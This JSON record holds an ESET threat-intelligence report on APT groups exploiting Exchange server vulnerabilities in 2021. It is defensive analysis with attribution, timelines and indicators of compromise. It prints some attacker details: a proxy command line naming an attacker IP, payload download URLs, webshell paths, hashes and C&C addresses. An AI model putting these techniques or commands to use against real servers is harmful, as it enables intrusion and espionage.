{
	"id": "217aeea0-e5e4-4f5e-9b95-7ab38cf818e9",
	"created_at": "2026-04-06T00:06:40.536184Z",
	"updated_at": "2026-04-10T03:37:21.660368Z",
	"deleted_at": null,
	"sha1_hash": "fac1b6bd2567479aaa03a7dde4069bb2f4470bfb",
	"title": "Exchange servers under siege from at least 10 APT groups",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 738922,
	"plain_text": "Exchange servers under siege from at least 10 APT groups\r\nBy Matthieu Faou, Thomas Dupuy and Mathieu Tartare\r\nArchived: 2026-04-05 18:57:56 UTC\r\nOn 2021-03-02, Microsoft released out-of-band patches for Microsoft Exchange Server 2013, 2016 and 2019. These security\r\nupdates fixed a pre-authentication remote code execution (RCE) vulnerability chain (CVE-2021-26855, CVE-2021-26857,\r\nCVE-2021-26858, and CVE-2021-27065) that allows an attacker to take over any reachable Exchange server, without even\r\nknowing any valid account credentials. We have already detected webshells on more than 5,000 email servers as of the time\r\nof writing, and according to public sources, several important organizations, such as the European Banking Authority,\r\nsuffered from this attack.\r\nESET customers are advised to read the following articles for information related to ESET products:\r\nA Microsoft Exchange saga: How is ESET technology protecting business customers post-exploitation? (ESET Corporate\r\nBlog)\r\nMicrosoft Exchange vulnerabilities discovered and exploited in-the-wild (ESET Customer Advisory)\r\nDoes ESET protect me from the Hafnium zero-day exploit in Microsoft Exchange? (ESET Knowledgebase)\r\nThese vulnerabilities were first discovered by Orange Tsai, a well-known vulnerability researcher, who reported them to\r\nMicrosoft on 2021-01-05. However, according to a blogpost by Volexity, in-the-wild exploitation had already started on\r\n2021-01-03. Thus, if these dates are correct, the vulnerabilities were either independently discovered by two different\r\nvulnerability research teams or information about the vulnerabilities was somehow obtained by a malicious entity.\r\nMicrosoft also published a blogpost about the early activity of Hafnium.\r\nOn 2021-02-28, we noticed that the vulnerabilities were used by other threat actors, starting with Tick and quickly joined by\r\nLuckyMouse, Calypso and the Winnti Group. 
This suggests that multiple threat actors gained access to the details of the\r\nvulnerabilities before the release of the patch, which means we can discard the possibility that they built an exploit by\r\nreverse engineering Microsoft updates.\r\nFinally, the day after the release of the patch, we started to see many more threat actors (including Tonto Team and\r\nMikroceen) scanning and compromising Exchange servers en masse. Interestingly, all of them are APT groups interested in\r\nespionage, except for one outlier (DLTMiner), which is linked to a known cryptomining campaign. A summary of the\r\ntimeline is shown in Figure 1.\r\nhttps://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/\r\nPage 1 of 11\n\nFigure 1. Timeline of important events\r\nExploitation statistics\r\nFor the past few days, ESET researchers have been monitoring closely the number of webshell detections for these exploits.\r\nAt the date of publication, we had observed more than 5,000 unique servers in over 115 countries where webshells were\r\nflagged. These numbers utilize ESET telemetry and are (obviously) not complete. Figure 2 illustrates these detections before\r\nand after the patch from Microsoft.\r\nFigure 2. ESET detection of the webshells dropped via CVE-2021-26855 (hourly)\r\nThe heatmap in Figure 3 shows the geographical distribution of the webshell detections, according to ESET telemetry. Due\r\nto mass exploitation, it is likely that it represents the distribution of vulnerable Exchange servers around the world on which\r\nESET security products are installed.\r\nFigure 3. 
Proportion of webshell detections by country (2021-02-28 to 2021-03-09)\r\nFrom RCE to webshells to backdoors\r\nWe have identified more than 10 different threat actors that likely leveraged the recent Microsoft Exchange RCE in order to\r\ninstall implants on victims’ email servers.\r\nOur analysis is based on email servers on which we found webshells in Offline Address Book (OAB) configuration files,\r\nwhich is a specific technique used in the exploitation of the RCE vulnerability and has already been detailed in a Unit 42\r\nblogpost. Unfortunately, we cannot discount the possibility that some threat actors might have hijacked the webshells\r\ndropped by other groups rather than directly using the exploit.\r\nOnce the vulnerability had been exploited and the webshell was in place, we observed attempts to install additional malware\r\nthrough it. We also noticed in some cases that several threat actors were targeting the same organization.\r\nTick\r\nOn 2021-02-28, Tick (also known as Bronze Butler) compromised the webserver of a company based in East Asia that\r\nprovides IT services. This means that the group likely had access to the exploit prior to the patch’s release – in this case at\r\nleast two days before.\r\nThe attacker used the following name for the first-stage webshell:\r\nC:\\inetpub\\wwwroot\\aspnet_client\\aspnet.aspx\r\nWe then observed a Delphi backdoor, highly similar to previous Delphi implants used by the group. C\u0026C addresses used by\r\nthis backdoor are www.averyspace[.]net and www.komdsecko[.]net.\r\nTick is an APT group active since as early as 2008 and targeting organizations primarily based in Japan but also in South\r\nKorea, Russia and Singapore amongst others. Its main objective seems to be intellectual property and classified information\r\ntheft. 
It makes use of various proprietary malware such as Daserf, xxmm and Datper as well as open source RATs such as\r\nLilith. Tick is among the APT groups now having access to the ShadowPad backdoor, which was used during Operation\r\nENTRADE documented by Trend Micro.\r\nLuckyMouse\r\nOn 2021-03-01, LuckyMouse compromised the email server of a governmental entity in the Middle East, which means this\r\nAPT group likely had access to the exploit at least one day before the patch release, when it was still a zero day.\r\nLuckyMouse operators started by dropping the Nbtscan tool in C:\\programdata\\, then installed a variant of the ReGeorg\r\nwebshell and issued a GET request to http://34.90.207[.]23/ip using curl. Finally, they attempted to install their SysUpdate\r\n(aka Soldier) modular backdoor that uses the aforementioned IP address as its C\u0026C server.\r\nLuckyMouse, also known as APT27 and Emissary Panda, is a cyberespionage group known to have breached multiple\r\ngovernment networks in Central Asia and the Middle East but also transnational organizations such as International Civil\r\nAviation Organization (ICAO) in 2016. It uses various custom malware families such as HyperBro and SysUpdate.\r\nCalypso\r\nOn 2021-03-01, Calypso compromised the email servers of governmental entities in the Middle East and in South America,\r\nwhich means the group likely had access to the exploit as a zero day, like LuckyMouse and Tick. 
In the following days,\r\nCalypso operators targeted additional servers of governmental entities and private companies in Africa, Asia and Europe\r\nusing the exploit.\r\nThe attacker used the following names for the first-stage webshell:\r\nC:\\inetpub\\wwwroot\\aspnet_client\\client.aspx\r\nC:\\inetpub\\wwwroot\\aspnet_client\\discover.aspx\r\nAs part of these attacks, two different backdoors were observed: a variant of PlugX specific to the group\r\n(Win32/Korplug.ED) and a custom backdoor that we detect as Win32/Agent.UFX (known as Whitebird in a Dr.Web report).\r\nThese tools are loaded using DLL search-order hijacking against legitimate executables (also dropped by the attackers):\r\nnetcfg.exe (SHA-1: 1349EF10BDD4FE58D6014C1043CBBC2E3BB19CC5) using a malicious DLL named\r\nnetcfg.dll (SHA-1: EB8D39CE08B32A07B7D847F6C29F4471CD8264F2)\r\nCLNTCON.exe (SHA-1: B423BEA76F996BF2F69DCC9E75097635D7B7A7AA) using a malicious DLL named\r\nSRVCON.OCX (SHA-1: 30DD3076EC9ABB13C15053234C436406B88FB2B9)\r\niPAQDetetion2.exe (SHA-1: C5D8FEC2C34572F5F2BD4F6B04B75E973FDFEA32) using a malicious DLL named\r\nrapi.dll (SHA-1: 4F0EA31A363CFE0D2BBB4A0B4C5D558A87D8683E)\r\nThe backdoors were configured to connect to the same C\u0026C servers: yolkish[.]com and rawfuns[.]com.\r\nFinally, we also observed a variant of a tool known as Mimikat_ssp that is available on GitHub.\r\nCalypso (which is also tied to XPATH) is a cyberespionage group targeting governmental institutions in Central Asia, the\r\nMiddle East, South America and Asia. Its main implant is a variant of the PlugX RAT.\r\nWebsiic\r\nStarting 2021-03-01, ESET researchers observed a new cluster of activity we have named Websiic, targeting seven email\r\nservers belonging to private companies (in the domains of IT, telecommunications and engineering) in Asia and a\r\ngovernmental body in Eastern Europe. 
As observed in the cases above, the operators behind this cluster likely had access to\r\nthe exploit before the patch’s release.\r\nThis cluster was identified by the presence of a loader as its first stage, generally named google.log or google.aspx, and an\r\nencrypted configuration file, generally named access.log. The loader stops a specific service identified in the config and\r\ncreates a new entry under the Windows service registry HKLM\\SYSTEM\\CurrentControlSet\\Services\\\u003cservicename\u003e\\Parameters (the service’s filename is provided by the config). It sets two keys ServiceDll and ServiceMain.\r\nThe first one contains the path to a DLL while the latter contains the export to call (INIT in this case). Finally, it restarts the\r\nservice that was stopped at the outset.\r\nWhile the loader was deployed on all victims from this cluster, the second stage (also a loader) was observed on the\r\ncomputer of only one of the victims and was located in C:\\Program Files\\Common Files\\microsoft shared\\WMI\\iiswmi.dll.\r\nThe DLL has an export named INIT that contains the main logic and uses the same XOR encryption loop as well as the\r\nsame technique to dynamically resolve the Windows API names as seen in the first stage. It loads the following DLL\r\n%COMMONPROGRAMFILES%\\System\\websvc.dll with an argument extracted from the registry key\r\nHKLM\\SOFTWARE\\Classes\\Interface\\{6FD0637B-85C6-D3A9-CCE9-65A3F73ADED9}. Unfortunately, the lack of\r\nindicators matching previously known threat actors prevents us from drawing any conclusions or a reasonable hypothesis as\r\nto the group behind these attacks.\r\nSeven victims were flagged by the presence of the first loader and at one of them, the second loader was identified. We have\r\nnot currently tied any known threat actor to Websiic. 
A recent article from GTSC also briefly describes the same cluster.\r\nWinnti Group\r\nStarting 2021-03-02, a few hours before Microsoft released the patch, the Winnti Group (also known as BARIUM or\r\nAPT41) compromised the email servers of an oil company and a construction equipment company both based in East Asia.\r\nThis indicates that this APT group also had access to the exploit prior to the patch release.\r\nThe attackers started by dropping webshells at the following locations, depending on the victim:\r\nC:\\inetpub\\wwwroot\\aspnet_client\\caches.aspx\r\nC:\\inetpub\\wwwroot\\aspnet_client\\shell.aspx\r\nAt one of the compromised victims we observed a PlugX RAT sample (also known as Korplug) with C\u0026C domain\r\nmm.portomnail[.]com and back.rooter.tk. Note that mm.portomnail[.]com was previously used by the Winnti Group with\r\nShadowPad and the Winnti malware. On the same machine, during the same timeframe, we also observed some malware,\r\nnot yet fully analyzed, using 139.162.123[.]108 as its C\u0026C address but at the time of writing we don’t know whether this is\r\nrelated to the Exchange compromise or not.\r\nAt the second victim, we observed a loader that is highly similar to previous Winnti v4 malware loaders such as that\r\nmentioned in our white paper on the arsenal of the Winnti Group. Like that Winnti v4 loader, this loader is used to decrypt\r\nan encrypted payload from disk and execute it using the following command:\r\nsrv64.exe \u003cDecryption_Key\u003e \u003cEncrypted_Payload_Filename\u003e\r\nwhere \u003cDecryption_key\u003e is the decryption key used to decrypt the payload stored in \u003cEncrypted_Payload_Filename\u003e. 
Once\r\nexecuted, this loader drops a malicious DLL at the following location:\r\nC:\\Windows\\system32\\oci.dll\r\nThis malicious DLL shares multiple similarities with a previous Winnti implant documented by Trend Micro as well as the\r\nSpyder backdoor recently documented by DrWeb and that we have observed being used by the Winnti Group in the past.\r\nThe C\u0026C address used by this implant is 161.129.64[.]124:443.\r\nAdditionally, we observed various Mimikatz and password dumping tools.\r\nThe Winnti Group, active since at least 2012, is responsible for high-profile supply-chain attacks against the video game and\r\nsoftware industries, leading to the distribution of trojanized software (such as CCleaner, ASUS LiveUpdate and multiple\r\nvideo games) that is then used to compromise more victims. It is also known for having compromised various targets in\r\nmultiple different verticals such as healthcare and education.\r\nTonto Team\r\nOn 2021-03-03, Tonto Team (also known as CactusPete) compromised the email servers of a procurement company and of a\r\nconsulting company specialized in software development and cybersecurity, both based in Eastern Europe.\r\nIn that case, the attacker used C:\\inetpub\\wwwroot\\aspnet_client\\dukybySSSS.aspx for the first-stage webshell.\r\nThe attacker then used PowerShell to download their payloads from 77.83.159[.]15. Those payloads consist of a legitimate\r\nand signed Microsoft executable used as a DLL search-order hijacking host and a malicious DLL loaded by that executable.\r\nThe malicious DLL is a ShadowPad loader. 
The C\u0026C address being used by ShadowPad here is lab.symantecsafe[.]org and\r\nthe communication protocol is HTTPS.\r\nIn addition to ShadowPad, the attacker also made use of a variant of the Bisonal RAT highly similar to a Bisonal variant that\r\nwas previously used during Operation Bitter Biscuit attributed to Tonto Team.\r\nOn one of the compromised machines, the attacker used an LSASS dumper that was also previously used by Tonto Team.\r\nTonto Team is an APT group active since at least 2009 and targeting governments and institutions mostly based in Russia,\r\nJapan and Mongolia. For more than ten years, Tonto Team has been using the Bisonal RAT. Tonto Team is one of the APT\r\ngroups that now has access to the ShadowPad backdoor.\r\nUnattributed ShadowPad activity\r\nStarting 2021-03-03, we observed the compromise of email servers at a software development company based in East Asia\r\nand a real estate company based in the Middle East where ShadowPad was dropped by the attacker and that we were not\r\nable to conclusively attribute to any known groups at the time of writing.\r\nThe attackers used C:\\inetpub\\wwwroot\\aspnet_client\\discover.aspx and C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\RedirSuiteServerProxy.aspx as first-stage webshells and dropped ShadowPad at\r\nthe following locations:\r\nC:\\Windows\\Help\\mui\\0109\\mscoree.dll\r\nC:\\mscoree.dll\r\nOne of the ShadowPad samples uses soft.mssysinfo[.]xyz as its C\u0026C address using the HTTPS protocol while the second\r\nsample uses ns.rtechs[.]org using the DNS protocol, which is less common.\r\nThe ShadowPad backdoor is a modular backdoor that was exclusive to the Winnti Group until the end of 2019. 
To the best of\r\nour knowledge, ShadowPad is now used by at least five additional groups: Tick, Tonto Team, KeyBoy, IceFog and TA428.\r\nThe “Opera” Cobalt Strike\r\nOn 2021-03-03 at 04:23 AM UTC, just a few hours after the patch was released, we noticed that another set of malicious\r\nactivities had started. At this point we don’t know if these threat actors had access to the exploit beforehand or reverse\r\nengineered the patch. This corresponds to indicators that were published on Twitter and by FireEye, but we haven’t been\r\nable to link this set to any group we are already tracking.\r\nFrom 2021-03-03 to 2021-03-05, ESET telemetry shows this activity targeting around 650 servers, mostly in the US,\r\nGermany, the UK and other European countries. Interestingly, this threat actor was consistent in the naming and location of\r\ntheir first-stage webshell, always using\r\n\u003cExchange_install_directory\u003e\\FrontEnd\\HttpProxy\\owa\\auth\\RedirSuiteServerProxy.aspx.\r\nThen on a few selected machines, they executed a PowerShell script, shown in Figure 4, to download additional components\r\nfrom 86.105.18[.]116. The final payload is Cobalt Strike, which uses the same IP address for its C\u0026C server. Cobalt Strike is\r\nloaded via DLL search-order hijacking against a legitimate Opera executable named opera_browser.exe (SHA-1:\r\nAB5AAA34200A3DD2276A20102AB9D7596FDB9A83) using a DLL named opera_browser.dll (SHA-1:\r\n02886F9DAA13F7D9855855048C54F1D6B1231B0A) that decrypts and loads a shellcode from opera_browser.png (SHA-1: 2886F9DAA13F7D9855855048C54F1D6B1231B0A). We noticed that 89.34.111[.]11 was also used to distribute\r\nmalicious files.\r\nFigure 4. 
PowerShell script used to download Cobalt Strike\r\nIIS backdoors\r\nStarting 2021-03-03, we observed that on four email servers located in Asia and South America, webshells were used to\r\ninstall so-called IIS backdoors.\r\nWe identified two different malware families:\r\nA modified version of IIS-Raid. It comes from a PoC released on GitHub and documented last year by MDSec.\r\nA variant of Owlproxy, which was documented last year by Cycraft as part of several incidents against Taiwanese\r\ngovernmental agencies.\r\nMikroceen\r\nOn 2021-03-04, the Mikroceen APT group compromised the Exchange server of a utility company in Central Asia, which is\r\nthe region it mainly targets.\r\nMikroceen operators started by dropping webshells in C:\\inetpub\\wwwroot\\aspnet_client\\aspnet_regiis.aspx,\r\n\u003cExchange_install_directory\u003e\\FrontEnd\\HttpProxy\\owa\\auth\\aspnet_error.aspx and\r\nC:\\inetpub\\wwwroot\\aspnet_client\\log_error_9e23efc3.aspx. Then, they downloaded a payload we could not recover from\r\nhttp://46.30.188[.]60/webengine4.dll. We were not able to tie those first steps to Mikroceen with high confidence, but these\r\nindicators appeared only on the specific server where we saw the Mikroceen backdoors a few hours after.\r\nA few hours later, a Mikroceen RAT was dropped in C:\\Users\\Public\\Downloads\\service.exe. Its C\u0026C server is\r\n172.105.18[.]72. Then, this RAT dropped additional tools such as Mimikatz (in C:\\users\\public\\alg.exe), Mimikat_ssp (in\r\nC:\\users\\public\\Dump.exe) and a custom proxy (in c:\\Users\\Public\\calcx.exe). The latter was executed with the following\r\ncommand line (exposing another attacker-controlled IP address):\r\ncalcx.exe  300 194.68.44[.]19 c:\\users\\public\\1.log \u003cprivate IP\u003e:3128\r\nThe Mikroceen APT group (aka Vicious Panda) is a threat actor operating since at least 2017. 
It mainly targets\r\ngovernmental institutions and telcos in Central Asia, Russia and Mongolia. It uses a custom backdoor we've named\r\nMikroceen RAT.\r\nDLTMiner\r\nStarting 2021-03-05 at 02:53 AM UTC, we detected the deployment of PowerShell downloaders on multiple email servers\r\nthat were previously targeted using these Exchange vulnerabilities.\r\nThe first PowerShell script downloads the next stage at the following address http://p.estonine[.]com/p?e. Previous articles\r\nfrom 2019 show similarities between this cluster and a cryptominer campaign. More details about the analysis can be found\r\nin Tencent and Carbon Black blogposts. A more recent Twitter post describes the various compromise steps.\r\nWe were unable to find any correlation in terms of webshells deployed on these servers. It is possible that this group is\r\nhijacking webshells previously installed by other threat groups.\r\nSummary\r\nOur ongoing research shows that not only Hafnium has been using the recent RCE vulnerability in Exchange, but that\r\nmultiple APTs have access to the exploit, and some even did so prior to the patch release. It is still unclear how the\r\ndistribution of the exploit happened, but it is inevitable that more and more threat actors, including ransomware operators,\r\nwill have access to it sooner or later.\r\nIt is now clearly beyond prime time to patch all Exchange servers as soon as possible (see Microsoft guidance and apply\r\nspecial care in following the steps in the “About installation of these updates” section). 
Even those not directly exposed to\r\nthe internet should be patched because an attacker with low, or unprivileged, access to your LAN can trivially exploit these\r\nvulnerabilities to raise their privileges while compromising an internal (and probably more sensitive) Exchange server, and\r\nthen move laterally from it.\r\nIn case of compromise, one should remove webshells, change credentials and investigate for any additional malicious\r\nactivity.\r\nFinally, this is a very good reminder that complex applications such as Microsoft Exchange or SharePoint should not be\r\nopen to the internet since, in case of mass exploitation, it is very hard, if not impossible, to patch in time.\r\nFor any inquiries, or to make sample submissions related to the subject, contact us at: threatintel@eset.com.\r\nIndicators of Compromise (IoCs)\r\nA plaintext list of Indicators of Compromise (IoCs) and a MISP event can be found in our GitHub repository.\r\nWebshells\r\nESET detects the webshells used in these attacks as JS/Exploit.CVE-2021-26855.Webshell.A and JS/Exploit.CVE-2021-26855.Webshell.B.\r\nThe ASPX webshells are typically placed in these folders, using a large variety of filenames:\r\nC:\\inetpub\\wwwroot\\aspnet_client\\system_web\\\r\n\u003cExchange install directory\u003e\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\\\r\n\u003cExchange install directory\u003e\\FrontEnd\\HttpProxy\\owa\\auth\\\r\nMalware files\r\nSHA-1 | ESET detection name | Details\r\n30DD3076EC9ABB13C15053234C436406B88FB2B9 | Win32/Korplug.RT | Calypso loader for Win32/Korplug.ED\r\nEB8D39CE08B32A07B7D847F6C29F4471CD8264F2 | Win32/Korplug.RU | Calypso loader for Win32/Korplug.ED\r\n4F0EA31A363CFE0D2BBB4A0B4C5D558A87D8683E | Win32/Agent.ACUS | Calypso loader for Win32/Agent.UFX\r\n2075D8E39B7D389F92FD97D97C41939F64822361 | Win64/HackTool.Mimikat.A | Mimikat_ssp used by 
Calypso\r\n02886F9DAA13F7D9855855048C54F1D6B1231B0A | Win32/Agent.ACUQ | Opera Cobalt Strike loader\r\n123CF9013FA73C4E1F8F68905630C8B5B481FCE7 | Win64/Mikroceen.AN | Mikroceen RAT\r\nB873C80562A0D4C3D0F8507B7B8EC82C4DF9FB07 | Win64/HackTool.Mimikat.A | Mimikat_ssp used by Mikroceen\r\n59C507BCBEFCA2E894471EFBCD40B5AAD5BC4AC8 | Win32/HackTool.Proxy.A | Proxy used by Mikroceen\r\n3D5D32A62F770608B6567EC5D18424C24C3F5798 | Win64/Kryptik.CHN | ShadowPad backdoor used by Tonto Team\r\nAF421B1F5A08499E130D24F448F6D79F7C76AF2B | Win64/Riskware.LsassDumper.J | LSASS dumper used by Tonto Team\r\n1DE8CBBF399CBC668B6DD6927CFEE06A7281CDA4 | Win32/Agent.ACGZ | PlugX injector used by the Winnti Group\r\nB8D7B850DC185160A24A3EE43606A9EF41D60E80 | Win64/Winnti.DA | Winnti loader\r\n33C7C049967F21DA0F1431A2D134F4F1DE9EC27E | Win64/HackTool.Mimikat.A | Mimikatz used by the Winnti Group\r\nA0B86104E2D00B3E52BDA5808CCEED9842CE2CEA | Win64/HackTool.Mimikat.A | Mimikatz used by the Winnti Group\r\n281FA52B967B08DBC1B51BAFBFBF7A258FF12E54 | Win32/PSWTool.QuarksPwDump.E | Password dumper used by the Winnti Group\r\n46F44B1760FF1DBAB6AAD44DEB1D68BEE0E714EA | Win64/Shadowpad.E | Unattributed ShadowPad\r\n195FC90AEE3917C94730888986E34A195C12EA78 | Win64/Shadowpad.E | Unattributed ShadowPad\r\n29D8DEDCF19A8691B4A3839B805730DDA9D0B87C | PowerShell/TrojanDownloader.Agent.CEK | DLTMiner\r\n20546C5A38191D1080B4EE8ADF1E54876BEDFB9E | PowerShell/TrojanDownloader.Agent.CEK | DLTMiner\r\n84F4AEAB426CE01334FD2DA3A11D981F6D9DCABB | Win64/Agent.AKS | Websiic\r\n9AFA2AFB838CAF2748D09D013D8004809D48D3E4 | Win64/Agent.AKS | Websiic\r\n3ED18FBE06D6EF2C8332DB70A3221A00F7251D55 | Win64/Agent.AKT | Websiic\r\nAA9BA493CB9E9FA6F9599C513EDBCBEE84ECECD6 | Win64/Agent.IG | IIS Backdoor\r\nC\u0026C servers\r\nIP address / domain | Details\r\n34.90.207[.]23 | LuckyMouse SysUpdate 
C\u0026C server\r\nyolkish[.]com | Calypso C\u0026C server\r\nrawfuns[.]com | Calypso C\u0026C server\r\n86.105.18[.]116 | “Opera Cobalt Strike” C\u0026C \u0026 distribution server\r\n89.34.111[.]11 | “Opera Cobalt Strike” distribution server\r\n172.105.18[.]72 | Mikroceen RAT C\u0026C server\r\n194.68.44[.]19 | Mikroceen proxy C\u0026C server\r\nwww.averyspace[.]net | Tick Delphi backdoor C\u0026C server\r\nwww.komdsecko[.]net | Tick Delphi backdoor C\u0026C server\r\n77.83.159[.]15 | Tonto Team distribution server\r\nlab.symantecsafe[.]org | Tonto Team ShadowPad C\u0026C server\r\nmm.portomnail[.]com | Winnti Group PlugX C\u0026C server\r\nback.rooter[.]tk | Winnti Group PlugX C\u0026C server\r\n161.129.64[.]124 | Winnti malware C\u0026C server\r\nns.rtechs[.]org | Unclassified ShadowPad C\u0026C server\r\nsoft.mssysinfo[.]xyz | Unclassified ShadowPad C\u0026C server\r\np.estonine[.]com | DLTMiner C\u0026C server\r\nMITRE ATT\u0026CK techniques\r\nNote 1: This table was built using version 8 of the MITRE ATT\u0026CK framework.\r\nNote 2: This table includes techniques covering the exploitation of the vulnerability and the webshell’s deployment.\r\nTactic | ID | Name | Description\r\nReconnaissance | T1595 | Active Scanning | Attackers are scanning the internet in order to find vulnerable Microsoft Exchange servers.\r\nResource Development | T1587.004 | Develop Capabilities: Exploits | Attackers developed or acquired exploits for CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065.\r\nInitial Access | T1190 | Exploit Public-Facing Application | Attackers exploited vulnerabilities in Microsoft Exchange 2013, 2016 and 2019 (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) to gain a foothold on the email servers.\r\nExecution | T1203 | Exploitation for Client Execution | Attackers exploited vulnerabilities in Microsoft 
Exchange 2013, 2016 and 2019 (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) to drop an ASPX webshell on the compromised email servers.\r\nPersistence | T1505.003 | Server Software Component: Web Shell | Attackers installed China Chopper ASPX webshells in IIS or Exchange folders reachable from the internet.\r\nSource: https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"MITRE",
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/"
	],
	"report_names": [
		"exchange-servers-under-siege-10-apt-groups"
	],
	"threat_actors": [
		{
			"id": "655f7d0b-7ea6-4950-b272-969ab7c27a4b",
			"created_at": "2022-10-27T08:27:13.133291Z",
			"updated_at": "2026-04-10T02:00:05.315213Z",
			"deleted_at": null,
			"main_name": "BITTER",
			"aliases": [
				"T-APT-17"
			],
			"source_name": "MITRE:BITTER",
			"tools": [
				"ZxxZ"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1aead86d-0c57-4e3b-b464-a69f6de20cde",
			"created_at": "2023-01-06T13:46:38.318176Z",
			"updated_at": "2026-04-10T02:00:02.925424Z",
			"deleted_at": null,
			"main_name": "DAGGER PANDA",
			"aliases": [
				"UAT-7290",
				"Red Foxtrot",
				"IceFog",
				"RedFoxtrot",
				"Red Wendigo",
				"PLA Unit 69010"
			],
			"source_name": "MISPGALAXY:DAGGER PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7c969685-459b-4c93-a788-74108eab6f47",
			"created_at": "2023-01-06T13:46:39.189751Z",
			"updated_at": "2026-04-10T02:00:03.241102Z",
			"deleted_at": null,
			"main_name": "HAFNIUM",
			"aliases": [
				"Red Dev 13",
				"Silk Typhoon",
				"MURKY PANDA",
				"ATK233",
				"G0125",
				"Operation Exchange Marauder"
			],
			"source_name": "MISPGALAXY:HAFNIUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5bbced13-72f7-40dc-8c41-dcce75bf885e",
			"created_at": "2022-10-25T15:50:23.695735Z",
			"updated_at": "2026-04-10T02:00:05.335976Z",
			"deleted_at": null,
			"main_name": "Winnti Group",
			"aliases": [
				"Winnti Group"
			],
			"source_name": "MITRE:Winnti Group",
			"tools": [
				"PipeMon",
				"Winnti for Windows",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "49822165-5541-423d-8808-1c0a9448d588",
			"created_at": "2022-10-25T16:07:23.384093Z",
			"updated_at": "2026-04-10T02:00:04.575678Z",
			"deleted_at": null,
			"main_name": "Barium",
			"aliases": [
				"Brass Typhoon",
				"Pigfish",
				"Starchy Taurus"
			],
			"source_name": "ETDA:Barium",
			"tools": [
				"Agent.dhwf",
				"Agentemis",
				"Barlaiy",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Destroy RAT",
				"DestroyRAT",
				"Kaba",
				"Korplug",
				"POISONPLUG",
				"PlugX",
				"RbDoor",
				"RedDelta",
				"RibDoor",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Winnti",
				"Xamtrav",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "bbefc37d-475c-4d4d-b80b-7a55f896de82",
			"created_at": "2022-10-25T15:50:23.571783Z",
			"updated_at": "2026-04-10T02:00:05.302196Z",
			"deleted_at": null,
			"main_name": "BRONZE BUTLER",
			"aliases": [
				"BRONZE BUTLER",
				"REDBALDKNIGHT"
			],
			"source_name": "MITRE:BRONZE BUTLER",
			"tools": [
				"Mimikatz",
				"build_downer",
				"cmd",
				"ABK",
				"at",
				"BBK",
				"schtasks",
				"down_new",
				"Daserf",
				"ShadowPad",
				"Windows Credential Editor",
				"gsecdump"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf",
			"created_at": "2023-01-06T13:46:38.626906Z",
			"updated_at": "2026-04-10T02:00:03.043681Z",
			"deleted_at": null,
			"main_name": "Tick",
			"aliases": [
				"G0060",
				"Stalker Taurus",
				"PLA Unit 61419",
				"Swirl Typhoon",
				"Nian",
				"BRONZE BUTLER",
				"REDBALDKNIGHT",
				"STALKER PANDA"
			],
			"source_name": "MISPGALAXY:Tick",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "58db0213-4872-41fe-8a76-a7014d816c73",
			"created_at": "2023-01-06T13:46:38.61757Z",
			"updated_at": "2026-04-10T02:00:03.040816Z",
			"deleted_at": null,
			"main_name": "Tonto Team",
			"aliases": [
				"G0131",
				"PLA Unit 65017",
				"Earth Akhlut",
				"TAG-74",
				"CactusPete",
				"KARMA PANDA",
				"BRONZE HUNTLEY",
				"Red Beifang"
			],
			"source_name": "MISPGALAXY:Tonto Team",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f5c5d5d4-3969-4e34-9982-55144c3908eb",
			"created_at": "2022-10-25T16:07:24.37846Z",
			"updated_at": "2026-04-10T02:00:04.965506Z",
			"deleted_at": null,
			"main_name": "Vicious Panda",
			"aliases": [
				"Bronze Dudley"
			],
			"source_name": "ETDA:Vicious Panda",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"BBSRAT",
				"Byeby",
				"Cmstar",
				"Enfal",
				"Lurid",
				"Pylot",
				"RoyalRoad",
				"Travle",
				"meciv"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "da483338-e479-4d74-a6dd-1fb09343fd07",
			"created_at": "2022-10-25T15:50:23.698197Z",
			"updated_at": "2026-04-10T02:00:05.355597Z",
			"deleted_at": null,
			"main_name": "Tonto Team",
			"aliases": [
				"Tonto Team",
				"Earth Akhlut",
				"BRONZE HUNTLEY",
				"CactusPete",
				"Karma Panda"
			],
			"source_name": "MITRE:Tonto Team",
			"tools": [
				"Mimikatz",
				"Bisonal",
				"ShadowPad",
				"LaZagne",
				"NBTscan",
				"gsecdump"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2f07a03f-eb1f-47c8-a8e9-a1a00f2ec253",
			"created_at": "2022-10-25T16:07:24.277669Z",
			"updated_at": "2026-04-10T02:00:04.919609Z",
			"deleted_at": null,
			"main_name": "TA428",
			"aliases": [
				"Operation LagTime IT",
				"Operation StealthyTrident",
				"ThunderCats"
			],
			"source_name": "ETDA:TA428",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"Agent.dhwf",
				"Albaniiutas",
				"BlueTraveller",
				"Chymine",
				"Cotx RAT",
				"CoughingDown",
				"Darkmoon",
